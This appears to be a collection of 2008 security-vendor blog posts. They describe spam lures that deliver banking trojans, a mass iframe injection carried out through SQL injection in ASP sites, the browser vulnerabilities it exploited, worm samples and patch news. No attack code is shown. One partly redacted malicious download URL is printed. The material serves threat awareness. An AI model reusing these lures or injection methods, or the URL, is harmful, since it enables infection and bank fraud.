Looks can be deceiving

We have recently detected another spam message that contains a malicious URL. This is nothing new, but what if you receive an email message coming from a reliable source, such as a security company?

This is what has happened with a spam message that uses our free online analysis tool Activescan as a bait to deceive users.

The following image is the fake message that the user would receive. Note that it contains the logo of our company, but as we can see the analysis tool points to a malicious URL and not Panda’s.

 If the link is followed, a file called ScanActive.zip will be downloaded, as can be seen in the image below:

 

This file is not really our online analysis tool but a Banker Trojan belonging to the Banbra family, concretely Banbra.FRJ, which is designed to steal confidential information related to certain Brazilian banking entities.
 

 

 

 

IFRAMES Attack !!! (Update II)

The first thing we observed when we analysed the attack which included an iframe pointing to a malicious website in hundreds of thousands of web pages was that all the compromised websites were in servers with IIS and MSSQL. Initially, the most likely hypothesis was that some known exploit was being used to attack some of these platforms.

However, after a deeper analysis, we observed that it was not a vulnerability in IIS or MSSQL Server, but some badly programmed asp code, which compromised the websites hosted in these IIS servers with MSSQL.

The asp code we show below (“orderitem.asp”), interacts with a MSSQL database, which allows the use of SQL injection techniques in order to insert data in the database, in such a way that it was possible to include the iframe in the hosted websites.

 

For security reasons, the whole asp code has not been included.

IFRAMES Attack !!! (Update)

This graph is an example of the infection process that takes place from the moment when a user accesses a legitimate website that has been modified until the possible infection is effective.

Thanks to Oscar and Olaiz for their collaboration.

IFRAMES Attack !!!

Nowadays it is usually taken for granted that we can only get infected if we visit malicious websites or run files coming from untrustworthy sources. However, lately we have detected several cases in which by exploiting vulnerabilities in the web servers malicious code can be introduced in the websites hosted in them.

Therefore, we might come across trustworthy websites which contain malicious code introduced by a cyber-crook.

The following is one piece of code we found introduced in certain websites:

 

It must be noted that up to now the number of websites that contain this piece of code are approximately 282.000.

 

This malicious script of the web, known as iframe, contains instructions that will be interpreted by the browser, redirecting it to a web or to the downloading of a malicious file. 

The instructions it contains are the following:

 

In this particular case, the user will be redirected transparently to a URL which will check if our system is protected against certain vulnerabilities. If any vulnerability is found, our computer will get infected with malware.

These are some of the vulnerabilities exploited to install malware in our computer:

MS06-014 Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution

MS07-004 Vulnerability in Vector Markup Language Could Allow Remote Code Execution

MS07-018 Vulnerabilities in Microsoft Content Management Server Could Allow Remote Code Execution

MS07-033 Cumulative Security Update for Internet Explorer

MS07-055 Vulnerability in kodak Image Viewer Could Allow Remote Code Execution

This implies that in spite of browsing through safe websites, we can come across legitimate web pages whose code has been previously modified in order to infect our computer.

That’s why we recommend you to check the updates of your operating system.

Kiss me!!!

Several years ago, the main aim of cyber-crooks was to achieve notoriety with their creations, that is, to be famous. In order to do so, they wanted to attract as much attention as possible and causing massive epidemics was their springboard to fame

Their motivation has changed and now is purely economic. The best way to obtain money is to carry out malicious actions as stealthily as possible. It has become a usual technique to hide malware creations using rootkits, such as the famous Stormworm family.

This trend has made malware creation become a very lucrative business.

However, we still come across with samples as eye-catching as W32/MSNworm.EI.worm, which spreads via the MSN Messenger and displays a funny picture of a little pig sending us a kiss while it is infecting our computer:

Microsoft Updates for April

Five critical and three important updates have been released (from MS08-018 to MS08-025). It's time to start updating your system if you haven't done it yet.

Critical updates affect these components: Microsoft Project, GDI, VBScript and JScript scripting engines, updated ActiveX Kill Bits and Internet Explorer. On the other hand, DNS Client, Windows Kernel and MIcrosoft Visio are patched with important updates.

Most of them allow remote code execution, so don't forget to update your system asap.

You can find more information about the security bulletins by clicking the following link: MS08-April

 

You are nominated…to distribute malware!!! (II)

Big Brother Brasil again. I am not very fond of this type of programs, but spammers have made me pay attention to them. J

Then, we wondered who would be the following participant selected to distribute malware. We thought they would make the selection among the finalists. However, this time the candidate has been a female participant called “Juliana”, who had already been evicted from the house.

 

These spam messages, which contain malicious websites, have subjects such as “Juliana do BBB do modo como você queria ver.” or “Chegou um Vivo FotoTorpedo para voce !!!”, and will invite us to view a video or photos of this participant. However, when the link of the message is followed (http://www.gallimard-jeunesse.fr/%5BRemoved%5D/visualizer/Visualizar.php), we will be redirected to a web from which the malware detected as Trj/Banbra.FPJ will be downloaded:

This Trojan is designed to obtain the affected users’ access keys to several banking entities.

P.S: If you feel curious to know who the winner of Big Brother Brasil 2008 was, it was Rafhina.

April Fools' Day malware

The social engineering never ends. Today is April Fools' Day, and we have received a spam message with a link, similar to the ones we could see in Saint Valentine. Some of the subjects we have seen so far:

– Today's Joke!
– Happy All Fools!
– Gotcha! April Fool!
– Happy April Fool's Day.
– All Fools' Day
– Surprise! The joke's on you.

This is what you see when you go to the site:

 

We have seen different file names being downloaded, as kickme.exe, foolsday.exe or funny.exe, but it is the same file, the name is the only thing that changes. We are detecting this malware as W32/Nuwar.SK.worm. Be careful, and as always, never trust this kind of messages.

Quarterly Report January-March 2008

We have just published the latest PandaLabs Quarterly Report. There, you can find statistics and information about the current situation of malware as well as different sections analyzing the most interesting events of the first quarter.

Regarding malware, Trojans continue being the most relevant category of malware, at 62.16%.

The well-known Storm Worm attack, which infected thousands of computers worldwide, is still active. That’s why it is worth mentioning and we have prepared a section in which we remember the most significant dates of its infection and the social engineering techniques it used to spread.

We also approach you about some of the tools used by the malware creators in order to check their creations’ undetectability.

Nowadays, the use of Web 2.0 services is very widespread, being the social networks one of the most extended services. The wider and more active a social network is, the higher the possibilities are of malware spreading on the network and reaching a high infection rate.

Finally, you will find an interesting article about mobile threats, being Symbian the target platform for malware creators.

You can download it in English or in Spanish .

   

Enjoy it!